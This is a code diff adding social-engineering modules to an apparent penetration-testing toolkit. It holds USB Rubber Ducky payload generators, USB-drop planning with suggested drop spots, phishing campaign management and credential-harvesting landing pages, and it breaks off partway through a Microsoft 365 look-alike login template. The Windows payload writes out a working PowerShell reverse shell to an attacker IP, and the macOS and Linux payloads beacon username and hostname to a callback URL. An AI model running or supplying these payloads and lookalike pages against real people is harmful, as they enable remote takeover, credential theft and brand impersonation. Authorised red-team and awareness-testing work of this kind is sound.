+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "hid-attack",
+      description: `HID attack for ${options.platform} - ${options.objective}`,
+      files: [
+        {
+          name: "payload.txt",
+          content: script,
+          type: "script",
+          hidden: false,
+        },
+      ],
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      notes: [
+        "Requires HID attack device (Rubber Ducky, BadUSB, etc.)",
+        `Target platform: ${options.platform}`,
+        `Delay: ${delay}ms for system to recognize device`,
+        "Test in controlled environment first",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate Windows HID script.
+   */
+  function generateWindowsHIDScript(
+    options: HIDAttackOptions,
+    delay: number
+  ): string {
+    const beaconCmd = `powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '${options.callbackUrl}?u=$env:USERNAME&c=$env:COMPUTERNAME' -UseBasicParsing"`
+
+    if (options.objective === "beacon") {
+      return `
+REM USB Rubber Ducky Payload - Windows Beacon
+REM Target: Windows 10/11
+REM Objective: ${options.objective}
+
+DELAY ${delay}
+GUI r
+DELAY 500
+STRING cmd /c ${beaconCmd}
+ENTER
+`
+    }
+
+    if (options.objective === "reverse-shell") {
+      return `
+REM USB Rubber Ducky Payload - Windows Reverse Shell
+REM Target: Windows 10/11
+REM IMPORTANT: Configure listener before deployment
+
+DELAY ${delay}
+GUI r
+DELAY 500
+STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
+ENTER
+DELAY 1000
+STRING $c=New-Object System.Net.Sockets.TCPClient('[ATTACKER_IP]',4444);
+STRING $s=$c.GetStream();[byte[]]$b=0..65535|%{0};
+STRING while(($i=$s.Read($b,0,$b.Length))-ne 0){
+STRING $d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);
+STRING $sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';
+STRING $sb=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()
+ENTER
+`
+    }
+
+    return `
+REM USB Rubber Ducky Payload - Windows
+REM Objective: ${options.objective}
+
+DELAY ${delay}
+GUI r
+DELAY 500
+STRING cmd
+ENTER
+DELAY 500
+STRING echo Payload executed
+ENTER
+`
+  }
+
+  /**
+   * Generate macOS HID script.
+   */
+  function generateMacOSHIDScript(
+    options: HIDAttackOptions,
+    delay: number
+  ): string {
+    const beaconCmd = `curl -s "${options.callbackUrl}?u=$(whoami)&c=$(hostname)"`
+
+    return `
+REM USB Rubber Ducky Payload - macOS
+REM Target: macOS 10.x+
+REM Objective: ${options.objective}
+
+DELAY ${delay}
+GUI SPACE
+DELAY 500
+STRING Terminal
+ENTER
+DELAY 1000
+STRING ${beaconCmd}
+ENTER
+DELAY 500
+STRING exit
+ENTER
+`
+  }
+
+  /**
+   * Generate Linux HID script.
+   */
+  function generateLinuxHIDScript(
+    options: HIDAttackOptions,
+    delay: number
+  ): string {
+    const beaconCmd = `curl -s "${options.callbackUrl}?u=$(whoami)&c=$(hostname)"`
+
+    return `
+REM USB Rubber Ducky Payload - Linux
+REM Target: Linux Desktop
+REM Objective: ${options.objective}
+
+DELAY ${delay}
+ALT F2
+DELAY 500
+STRING gnome-terminal
+ENTER
+DELAY 1000
+STRING ${beaconCmd}
+ENTER
+DELAY 500
+STRING exit
+ENTER
+`
+  }
+
+  // ========== USB Drop Planning ==========
+
+  /**
+   * USB drop campaign.
+   */
+  export interface USBDropCampaign {
+    id: string
+    name: string
+    authorization: string
+    location: string
+    dropPoints: DropPoint[]
+    payloads: USBPayload[]
+    status: "planning" | "active" | "completed"
+    results: USBDropResults
+    createdAt: number
+  }
+
+  /**
+   * USB drop point.
+   */
+  export interface DropPoint {
+    id: string
+    location: string
+    description: string
+    targetProfile: string
+    droppedAt?: number
+    retrievedAt?: number
+    triggered: boolean
+  }
+
+  /**
+   * USB drop results.
+   */
+  export interface USBDropResults {
+    dropped: number
+    retrieved: number
+    triggered: number
+    callbacks: number
+  }
+
+  /**
+   * Create USB drop campaign.
+   */
+  export function createCampaign(options: {
+    name: string
+    authorization: string
+    location: string
+    dropPoints?: DropPoint[]
+  }): USBDropCampaign {
+    return {
+      id: SocEngStorage.createCampaignId(),
+      name: options.name,
+      authorization: options.authorization,
+      location: options.location,
+      dropPoints: options.dropPoints || [],
+      payloads: [],
+      status: "planning",
+      results: {
+        dropped: 0,
+        retrieved: 0,
+        triggered: 0,
+        callbacks: 0,
+      },
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Suggested drop locations.
+   */
+  export const SUGGESTED_DROP_LOCATIONS = [
+    "Parking lot near entrance",
+    "Lobby/reception area",
+    "Smoking area",
+    "Break room",
+    "Conference room",
+    "Near elevator banks",
+    "Cafeteria",
+    "Restroom hallway",
+    "Near badge readers",
+    "Loading dock",
+  ]
+
+  // ========== Formatting ==========
+
+  /**
+   * Format USB payload for display.
+   */
+  export function formatPayload(payload: USBPayload): string {
+    const lines: string[] = []
+
+    lines.push(`USB Payload: ${payload.name}`)
+    lines.push("=".repeat(40))
+    lines.push(`Type: ${payload.type}`)
+    lines.push(`Description: ${payload.description}`)
+    lines.push(`Tracking: ${payload.trackingEnabled ? "Enabled" : "Disabled"}`)
+    if (payload.callbackUrl) {
+      lines.push(`Callback: ${payload.callbackUrl}`)
+    }
+    lines.push("")
+    lines.push("Files:")
+    for (const file of payload.files) {
+      const hidden = file.hidden ? " [HIDDEN]" : ""
+      lines.push(`  • ${file.name} (${file.type})${hidden}`)
+    }
+    lines.push("")
+    lines.push("Notes:")
+    for (const note of payload.notes) {
+      lines.push(`  - ${note}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format campaign summary.
+   */
+  export function formatCampaign(campaign: USBDropCampaign): string {
+    const lines: string[] = []
+
+    lines.push(`USB Drop Campaign: ${campaign.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Location: ${campaign.location}`)
+    lines.push(`Status: ${campaign.status}`)
+    lines.push(`Authorization: ${campaign.authorization}`)
+    lines.push("")
+    lines.push(`Drop Points: ${campaign.dropPoints.length}`)
+    lines.push(`Payloads: ${campaign.payloads.length}`)
+    lines.push("")
+    lines.push("Results:")
+    lines.push(`  Dropped: ${campaign.results.dropped}`)
+    lines.push(`  Retrieved: ${campaign.results.retrieved}`)
+    lines.push(`  Triggered: ${campaign.results.triggered}`)
+    lines.push(`  Callbacks: ${campaign.results.callbacks}`)
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/phishing/campaigns.ts b/packages/opencode/src/pentest/soceng/phishing/campaigns.ts
new file mode 100644
index 00000000000..fa4ebc66d95
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/campaigns.ts
@@ -0,0 +1,710 @@
+/**
+ * @fileoverview Phishing Campaign Management
+ *
+ * Campaign lifecycle management for phishing simulations.
+ *
+ * @module pentest/soceng/phishing/campaigns
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { SocEngProfiles } from "../profiles"
+import { Bus } from "../../../bus"
+import { SocEngEvents } from "../events"
+
+/**
+ * Phishing campaigns namespace.
+ */
+export namespace PhishingCampaigns {
+  // ========== Campaign Creation ==========
+
+  /**
+   * Campaign creation options.
+   */
+  export interface CreateCampaignOptions {
+    name: string
+    type: SocEngTypes.CampaignType
+    authorization: string
+    description?: string
+    profile?: string
+    targets?: SocEngTypes.Target[]
+    template?: SocEngTypes.EmailTemplate
+    landingPage?: SocEngTypes.LandingPage
+    startDate?: number
+    endDate?: number
+    sendingProfile?: SendingProfile
+  }
+
+  /**
+   * Sending profile for email delivery.
+   */
+  export interface SendingProfile {
+    smtpHost: string
+    smtpPort: number
+    smtpUser?: string
+    smtpPass?: string
+    useTLS: boolean
+    fromAddress: string
+    fromName: string
+    envelopeFrom?: string
+  }
+
+  /**
+   * Create a new phishing campaign.
+   */
+  export async function createCampaign(
+    options: CreateCampaignOptions
+  ): Promise<SocEngTypes.Campaign> {
+    const campaignId = SocEngStorage.createCampaignId()
+
+    // Get profile configuration if specified
+    const profileConfig = options.profile
+      ? SocEngProfiles.getCampaignProfile(options.profile)
+      : undefined
+
+    const campaign: SocEngTypes.Campaign = {
+      id: campaignId,
+      name: options.name,
+      type: options.type,
+      status: "draft",
+      authorization: options.authorization,
+      description: options.description,
+      targets: options.targets || [],
+      templates: options.template ? [options.template] : [],
+      landingPages: options.landingPage ? [options.landingPage] : [],
+      startDate: options.startDate,
+      endDate: options.endDate,
+      results: {
+        sent: 0,
+        opened: 0,
+        clicked: 0,
+        submitted: 0,
+        reported: 0,
+      },
+      timeline: [],
+      createdAt: Date.now(),
+    }
+
+    await SocEngStorage.storeCampaign(campaign)
+
+    Bus.publish(SocEngEvents.CampaignCreated, {
+      campaignId,
+      name: options.name,
+      type: options.type,
+      targetCount: campaign.targets.length,
+    })
+
+    return campaign
+  }
+
+  // ========== Campaign Lifecycle ==========
+
+  /**
+   * Start a campaign.
+   */
+  export async function startCampaign(campaignId: string): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (campaign.status !== "draft" && campaign.status !== "paused") {
+      throw new Error(`Cannot start campaign in ${campaign.status} status`)
+    }
+
+    if (campaign.targets.length === 0) {
+      throw new Error("Campaign has no targets")
+    }
+
+    if (!campaign.templates || campaign.templates.length === 0) {
+      throw new Error("Campaign has no email templates")
+    }
+
+    campaign.status = "active"
+    campaign.startDate = campaign.startDate || Date.now()
+
+    await SocEngStorage.storeCampaign(campaign)
+    await addTimelineEvent(campaignId, "campaign_started", "Campaign started")
+
+    Bus.publish(SocEngEvents.CampaignStarted, {
+      campaignId,
+      targetCount: campaign.targets.length,
+    })
+  }
+
+  /**
+   * Pause a campaign.
+   */
+  export async function pauseCampaign(campaignId: string): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (campaign.status !== "active") {
+      throw new Error(`Cannot pause campaign in ${campaign.status} status`)
+    }
+
+    campaign.status = "paused"
+    await SocEngStorage.storeCampaign(campaign)
+    await addTimelineEvent(campaignId, "campaign_paused", "Campaign paused")
+
+    Bus.publish(SocEngEvents.CampaignPaused, { campaignId })
+  }
+
+  /**
+   * Complete a campaign.
+   */
+  export async function completeCampaign(campaignId: string): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    campaign.status = "completed"
+    campaign.endDate = Date.now()
+
+    await SocEngStorage.storeCampaign(campaign)
+    await addTimelineEvent(campaignId, "campaign_completed", "Campaign completed")
+
+    Bus.publish(SocEngEvents.CampaignCompleted, {
+      campaignId,
+      results: campaign.results,
+    })
+  }
+
+  // ========== Target Management ==========
+
+  /**
+   * Add targets to a campaign.
+   */
+  export async function addTargets(
+    campaignId: string,
+    targets: SocEngTypes.Target[]
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (campaign.status !== "draft") {
+      throw new Error("Cannot add targets to non-draft campaign")
+    }
+
+    // Deduplicate by email
+    const existingEmails = new Set(campaign.targets.map((t) => t.email.toLowerCase()))
+    const newTargets = targets.filter(
+      (t) => !existingEmails.has(t.email.toLowerCase())
+    )
+
+    campaign.targets.push(...newTargets)
+    await SocEngStorage.storeCampaign(campaign)
+
+    await addTimelineEvent(
+      campaignId,
+      "targets_added",
+      `Added ${newTargets.length} targets`
+    )
+  }
+
+  /**
+   * Remove target from campaign.
+   */
+  export async function removeTarget(
+    campaignId: string,
+    targetId: string
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    campaign.targets = campaign.targets.filter((t) => t.id !== targetId)
+    await SocEngStorage.storeCampaign(campaign)
+  }
+
+  /**
+   * Import targets from CSV.
+   */
+  export function parseTargetsFromCSV(
+    csv: string,
+    mapping?: Record<string, string>
+  ): SocEngTypes.TargetWithStatus[] {
+    const lines = csv.trim().split("\n")
+    if (lines.length < 2) {
+      return []
+    }
+
+    const headers = lines[0].split(",").map((h) => h.trim().toLowerCase())
+    const targets: SocEngTypes.TargetWithStatus[] = []
+
+    // Default mapping
+    const fieldMap = mapping || {
+      email: headers.includes("email") ? "email" : headers[0],
+      firstName: headers.includes("firstname")
+        ? "firstname"
+        : headers.includes("first_name")
+          ? "first_name"
+          : "first",
+      lastName: headers.includes("lastname")
+        ? "lastname"
+        : headers.includes("last_name")
+          ? "last_name"
+          : "last",
+      department: "department",
+      title: "title",
+      company: "company",
+    }
+
+    for (let i = 1; i < lines.length; i++) {
+      const values = parseCSVLine(lines[i])
+      if (values.length === 0) continue
+
+      const row: Record<string, string> = {}
+      headers.forEach((h, idx) => {
+        row[h] = values[idx] || ""
+      })
+
+      const email = row[fieldMap.email]
+      if (!email || !email.includes("@")) continue
+
+      targets.push({
+        id: SocEngStorage.createTargetId(),
+        email,
+        firstName: row[fieldMap.firstName],
+        lastName: row[fieldMap.lastName],
+        department: row[fieldMap.department],
+        title: row[fieldMap.title],
+        status: "pending",
+      })
+    }
+
+    return targets
+  }
+
+  /**
+   * Parse CSV line handling quoted values.
+   */
+  function parseCSVLine(line: string): string[] {
+    const values: string[] = []
+    let current = ""
+    let inQuotes = false
+
+    for (const char of line) {
+      if (char === '"') {
+        inQuotes = !inQuotes
+      } else if (char === "," && !inQuotes) {
+        values.push(current.trim())
+        current = ""
+      } else {
+        current += char
+      }
+    }
+    values.push(current.trim())
+
+    return values
+  }
+
+  // ========== Template Management ==========
+
+  /**
+   * Add template to campaign.
+   */
+  export async function addTemplate(
+    campaignId: string,
+    template: SocEngTypes.EmailTemplate
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (!campaign.templates) {
+      campaign.templates = []
+    }
+    campaign.templates.push(template)
+    await SocEngStorage.storeCampaign(campaign)
+  }
+
+  /**
+   * Add landing page to campaign.
+   */
+  export async function addLandingPage(
+    campaignId: string,
+    landingPage: SocEngTypes.LandingPage
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (!campaign.landingPages) {
+      campaign.landingPages = []
+    }
+    campaign.landingPages.push(landingPage)
+    await SocEngStorage.storeCampaign(campaign)
+  }
+
+  // ========== Results & Statistics ==========
+
+  /**
+   * Update campaign results.
+   */
+  export async function updateResults(
+    campaignId: string,
+    updates: Partial<SocEngTypes.CampaignResults>
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    const defaultResults = { sent: 0, opened: 0, clicked: 0, submitted: 0, reported: 0 }
+    campaign.results = { ...defaultResults, ...campaign.results, ...updates }
+    await SocEngStorage.storeCampaign(campaign)
+  }
+
+  /**
+   * Increment a result counter.
+   */
+  export async function incrementResult(
+    campaignId: string,
+    field: keyof SocEngTypes.EmbeddedResults
+  ): Promise<void> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    if (!campaign.results) {
+      campaign.results = { sent: 0, opened: 0, clicked: 0, submitted: 0, reported: 0 }
+    }
+    campaign.results[field]++
+    await SocEngStorage.storeCampaign(campaign)
+  }
+
+  /**
+   * Get campaign statistics.
+   */
+  export async function getStatistics(
+    campaignId: string
+  ): Promise<CampaignStatistics> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    const totalTargets = campaign.targets.length
+    const results = campaign.results || { sent: 0, opened: 0, clicked: 0, submitted: 0, reported: 0 }
+    const { sent, opened, clicked, submitted, reported } = results
+
+    return {
+      campaignId,
+      totalTargets,
+      sent,
+      opened,
+      clicked,
+      submitted,
+      reported,
+      openRate: sent > 0 ? (opened / sent) * 100 : 0,
+      clickRate: opened > 0 ? (clicked / opened) * 100 : 0,
+      submitRate: clicked > 0 ? (submitted / clicked) * 100 : 0,
+      reportRate: sent > 0 ? (reported / sent) * 100 : 0,
+      status: campaign.status,
+      duration: campaign.endDate
+        ? campaign.endDate - (campaign.startDate || campaign.createdAt)
+        : Date.now() - (campaign.startDate || campaign.createdAt),
+    }
+  }
+
+  /**
+   * Campaign statistics.
+   */
+  export interface CampaignStatistics {
+    campaignId: string
+    totalTargets: number
+    sent: number
+    opened: number
+    clicked: number
+    submitted: number
+    reported: number
+    openRate: number
+    clickRate: number
+    submitRate: number
+    reportRate: number
+    status: SocEngTypes.CampaignStatus
+    duration: number
+  }
+
+  // ========== Timeline ==========
+
+  /**
+   * Add event to campaign timeline.
+   */
+  export async function addTimelineEvent(
+    campaignId: string,
+    type: string,
+    description: string,
+    targetId?: string
+  ): Promise<void> {
+    const event: SocEngTypes.TimelineEvent = {
+      id: SocEngStorage.createEventId(),
+      campaignId,
+      targetId,
+      type,
+      description,
+      timestamp: Date.now(),
+    }
+
+    await SocEngStorage.storeEvent(event)
+  }
+
+  /**
+   * Get campaign timeline.
+   */
+  export async function getTimeline(
+    campaignId: string
+  ): Promise<SocEngTypes.TimelineEvent[]> {
+    return SocEngStorage.getEventsForCampaign(campaignId)
+  }
+
+  // ========== Reporting ==========
+
+  /**
+   * Generate campaign report.
+   */
+  export async function generateReport(campaignId: string): Promise<CampaignReport> {
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      throw new Error(`Campaign not found: ${campaignId}`)
+    }
+
+    const stats = await getStatistics(campaignId)
+    const timeline = await getTimeline(campaignId)
+
+    // Group targets by status
+    const targetsByStatus = campaign.targets.reduce(
+      (acc, target) => {
+        const status = target.status || "pending"
+        acc[status] = (acc[status] || 0) + 1
+        return acc
+      },
+      {} as Record<string, number>
+    )
+
+    // Calculate time-based metrics
+    const timeMetrics = calculateTimeMetrics(timeline)
+
+    return {
+      campaign: {
+        id: campaign.id,
+        name: campaign.name,
+        type: campaign.type,
+        status: campaign.status,
+        authorization: campaign.authorization,
+        startDate: campaign.startDate,
+        endDate: campaign.endDate,
+      },
+      statistics: stats,
+      targetBreakdown: targetsByStatus,
+      timeMetrics,
+      timeline: timeline.slice(0, 100), // Last 100 events
+      recommendations: generateRecommendations(stats),
+    }
+  }
+
+  /**
+   * Campaign report structure.
+   */
+  export interface CampaignReport {
+    campaign: {
+      id: string
+      name: string
+      type: SocEngTypes.CampaignType
+      status: SocEngTypes.CampaignStatus
+      authorization: string
+      startDate?: number
+      endDate?: number
+    }
+    statistics: CampaignStatistics
+    targetBreakdown: Record<string, number>
+    timeMetrics: TimeMetrics
+    timeline: SocEngTypes.TimelineEvent[]
+    recommendations: string[]
+  }
+
+  /**
+   * Time-based metrics.
+   */
+  export interface TimeMetrics {
+    avgTimeToOpen: number
+    avgTimeToClick: number
+    avgTimeToSubmit: number
+    peakActivityHour: number
+    peakActivityDay: string
+  }
+
+  /**
+   * Calculate time metrics from timeline.
+   */
+  function calculateTimeMetrics(
+    timeline: SocEngTypes.TimelineEvent[]
+  ): TimeMetrics {
+    const openTimes: number[] = []
+    const clickTimes: number[] = []
+    const submitTimes: number[] = []
+    const hours: number[] = new Array(24).fill(0)
+    const days: number[] = new Array(7).fill(0)
+
+    const eventsByTarget: Record<string, SocEngTypes.TimelineEvent[]> = {}
+
+    for (const event of timeline) {
+      if (event.targetId) {
+        if (!eventsByTarget[event.targetId]) {
+          eventsByTarget[event.targetId] = []
+        }
+        eventsByTarget[event.targetId].push(event)
+      }
+
+      // Track activity by hour and day
+      const date = new Date(event.timestamp)
+      hours[date.getHours()]++
+      days[date.getDay()]++
+    }
+
+    // Calculate time differences
+    for (const events of Object.values(eventsByTarget)) {
+      const sorted = events.sort((a, b) => a.timestamp - b.timestamp)
+      const sentEvent = sorted.find((e) => e.type === "email_sent")
+      const openEvent = sorted.find((e) => e.type === "email_opened")
+      const clickEvent = sorted.find((e) => e.type === "link_clicked")
+      const submitEvent = sorted.find((e) => e.type === "credential_submitted")
+
+      if (sentEvent && openEvent) {
+        openTimes.push(openEvent.timestamp - sentEvent.timestamp)
+      }
+      if (openEvent && clickEvent) {
+        clickTimes.push(clickEvent.timestamp - openEvent.timestamp)
+      }
+      if (clickEvent && submitEvent) {
+        submitTimes.push(submitEvent.timestamp - clickEvent.timestamp)
+      }
+    }
+
+    const avg = (arr: number[]) =>
+      arr.length > 0 ? arr.reduce((a, b) => a + b, 0) / arr.length : 0
+
+    const dayNames = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"]
+
+    return {
+      avgTimeToOpen: avg(openTimes),
+      avgTimeToClick: avg(clickTimes),
+      avgTimeToSubmit: avg(submitTimes),
+      peakActivityHour: hours.indexOf(Math.max(...hours)),
+      peakActivityDay: dayNames[days.indexOf(Math.max(...days))],
+    }
+  }
+
+  /**
+   * Generate recommendations based on statistics.
+   */
+  function generateRecommendations(stats: CampaignStatistics): string[] {
+    const recommendations: string[] = []
+
+    if (stats.openRate > 50) {
+      recommendations.push(
+        "High open rate indicates effective subject lines - consider analyzing what made them compelling"
+      )
+    }
+
+    if (stats.clickRate > 30) {
+      recommendations.push(
+        "High click rate suggests users are susceptible to phishing - prioritize security awareness training"
+      )
+    }
+
+    if (stats.submitRate > 20) {
+      recommendations.push(
+        "Critical: Over 20% credential submission rate - implement mandatory phishing training"
+      )
+    }
+
+    if (stats.reportRate < 10) {
+      recommendations.push(
+        "Low report rate - train users on how to identify and report suspicious emails"
+      )
+    }
+
+    if (stats.reportRate > 50) {
+      recommendations.push(
+        "Excellent report rate - security awareness program is effective"
+      )
+    }
+
+    return recommendations
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format campaign summary for display.
+   */
+  export function formatCampaignSummary(campaign: SocEngTypes.Campaign): string {
+    const lines: string[] = []
+    const results = campaign.results || { sent: 0, opened: 0, clicked: 0, submitted: 0, reported: 0 }
+
+    lines.push(`Campaign: ${campaign.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`ID: ${campaign.id}`)
+    lines.push(`Type: ${campaign.type}`)
+    lines.push(`Status: ${campaign.status}`)
+    lines.push(`Targets: ${campaign.targets.length}`)
+    lines.push(`Templates: ${(campaign.templates || []).length}`)
+    lines.push("")
+    lines.push("Results:")
+    lines.push(`  Sent: ${results.sent}`)
+    lines.push(`  Opened: ${results.opened}`)
+    lines.push(`  Clicked: ${results.clicked}`)
+    lines.push(`  Submitted: ${results.submitted}`)
+    lines.push(`  Reported: ${results.reported}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format statistics for display.
+   */
+  export function formatStatistics(stats: CampaignStatistics): string {
+    const lines: string[] = []
+
+    lines.push("Campaign Statistics")
+    lines.push("=".repeat(40))
+    lines.push(`Total Targets: ${stats.totalTargets}`)
+    lines.push(`Emails Sent: ${stats.sent}`)
+    lines.push("")
+    lines.push("Engagement Rates:")
+    lines.push(`  Open Rate: ${stats.openRate.toFixed(1)}%`)
+    lines.push(`  Click Rate: ${stats.clickRate.toFixed(1)}%`)
+    lines.push(`  Submit Rate: ${stats.submitRate.toFixed(1)}%`)
+    lines.push(`  Report Rate: ${stats.reportRate.toFixed(1)}%`)
+    lines.push("")
+    lines.push(`Duration: ${formatDuration(stats.duration)}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format duration in human readable form.
+   */
+  function formatDuration(ms: number): string {
+    const seconds = Math.floor(ms / 1000)
+    const minutes = Math.floor(seconds / 60)
+    const hours = Math.floor(minutes / 60)
+    const days = Math.floor(hours / 24)
+
+    if (days > 0) return `${days}d ${hours % 24}h`
+    if (hours > 0) return `${hours}h ${minutes % 60}m`
+    if (minutes > 0) return `${minutes}m`
+    return `${seconds}s`
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/phishing/index.ts b/packages/opencode/src/pentest/soceng/phishing/index.ts
new file mode 100644
index 00000000000..089b8a911ef
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Phishing Module
+ *
+ * Phishing campaign management and execution.
+ *
+ * @module pentest/soceng/phishing
+ */
+
+export { PhishingCampaigns } from "./campaigns"
+export { PhishingTemplates } from "./templates"
+export { PhishingTracking } from "./tracking"
+export { PhishingLanding } from "./landing"
+export { PhishingPayloads } from "./payloads"
diff --git a/packages/opencode/src/pentest/soceng/phishing/landing.ts b/packages/opencode/src/pentest/soceng/phishing/landing.ts
new file mode 100644
index 00000000000..cfa8c0344f6
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/landing.ts
@@ -0,0 +1,588 @@
+/**
+ * @fileoverview Phishing Landing Page Generator
+ *
+ * Generation of credential harvesting landing pages for phishing simulations.
+ *
+ * @module pentest/soceng/phishing/landing
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+
+/**
+ * Phishing landing pages namespace.
+ */
+export namespace PhishingLanding {
+  // ========== Page Templates ==========
+
+  /**
+   * Landing page template.
+   */
+  export interface LandingPageTemplate {
+    id: string
+    name: string
+    description: string
+    category: string
+    html: string
+    css: string
+    fields: FormField[]
+    redirectUrl?: string
+  }
+
+  /**
+   * Form field definition.
+   */
+  export interface FormField {
+    name: string
+    type: "text" | "email" | "password" | "hidden"
+    label: string
+    placeholder?: string
+    required: boolean
+    capture: boolean
+  }
+
+  // ========== Built-in Templates ==========
+
+  /**
+   * Generic login page template.
+   */
+  export const GENERIC_LOGIN: LandingPageTemplate = {
+    id: "generic-login",
+    name: "Generic Login",
+    description: "Simple generic login page",
+    category: "login",
+    html: `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Sign In</title>
+  <style>{{CSS}}</style>
+</head>
+<body>
+  <div class="container">
+    <div class="login-box">
+      <h1>Sign In</h1>
+      <p class="subtitle">Enter your credentials to continue</p>
+      <form method="POST" action="{{SUBMIT_URL}}">
+        <input type="hidden" name="campaign_id" value="{{CAMPAIGN_ID}}">
+        <input type="hidden" name="target_id" value="{{TARGET_ID}}">
+        <div class="form-group">
+          <label for="email">Email Address</label>
+          <input type="email" id="email" name="email" placeholder="you@example.com" required>
+        </div>
+        <div class="form-group">
+          <label for="password">Password</label>
+          <input type="password" id="password" name="password" placeholder="••••••••" required>
+        </div>
+        <button type="submit">Sign In</button>
+        <div class="links">
+          <a href="#">Forgot password?</a>
+          <a href="#">Create account</a>
+        </div>
+      </form>
+    </div>
+  </div>
+</body>
+</html>`,
+    css: `
+* { box-sizing: border-box; margin: 0; padding: 0; }
+body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: #f5f5f5; min-height: 100vh; display: flex; align-items: center; justify-content: center; }
+.container { width: 100%; max-width: 400px; padding: 20px; }
+.login-box { background: white; padding: 40px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+h1 { font-size: 24px; margin-bottom: 8px; color: #333; }
+.subtitle { color: #666; margin-bottom: 30px; }
+.form-group { margin-bottom: 20px; }
+label { display: block; margin-bottom: 8px; color: #333; font-weight: 500; }
+input[type="email"], input[type="password"], input[type="text"] { width: 100%; padding: 12px; border: 1px solid #ddd; border-radius: 4px; font-size: 16px; }
+input:focus { outline: none; border-color: #4285f4; }
+button { width: 100%; padding: 12px; background: #4285f4; color: white; border: none; border-radius: 4px; font-size: 16px; cursor: pointer; }
+button:hover { background: #357abd; }
+.links { margin-top: 20px; text-align: center; }
+.links a { color: #4285f4; text-decoration: none; margin: 0 10px; font-size: 14px; }`,
+    fields: [
+      { name: "email", type: "email", label: "Email Address", placeholder: "you@example.com", required: true, capture: true },
+      { name: "password", type: "password", label: "Password", placeholder: "••••••••", required: true, capture: true },
+    ],
+  }
+
+  /**
+   * Microsoft 365 login page template.
+   */
+  export const MICROSOFT_365: LandingPageTemplate = {
+    id: "microsoft-365",
+    name: "Microsoft 365",
+    description: "Microsoft 365 style login page",
+    category: "login",
+    html: `
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Sign in to your account</title>
+  <style>{{CSS}}</style>
+</head>
+<body>
+  <div class="container">
+    <div class="login-box">
+      <div class="logo">
+        <svg viewBox="0 0 23 23" width="108" height="24"><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>
+      </div>
+      <h1>Sign in</h1>
+      <form method="POST" action="{{SUBMIT_URL}}" id="login-form">
+        <input type="hidden" name="campaign_id" value="{{CAMPAIGN_ID}}">
+        <input type="hidden" name="target_id" value="{{TARGET_ID}}">
+        <div class="form-group" id="email-step">
+          <input type="email" id="email" name="email" placeholder="Email, phone, or Skype" required>
+          <p class="hint">No account? <a href="#">Create one!</a></p>
+          <button type="button" onclick="showPassword()">Next</button>
+        </div>
+        <div class="form-group" id="password-step" style="display:none;">
+          <div class="user-display">
+            <span class="back" onclick="showEmail()">←</span>
+            <span id="user-email"></span>
+          </div>
+          <label>Enter password</label>
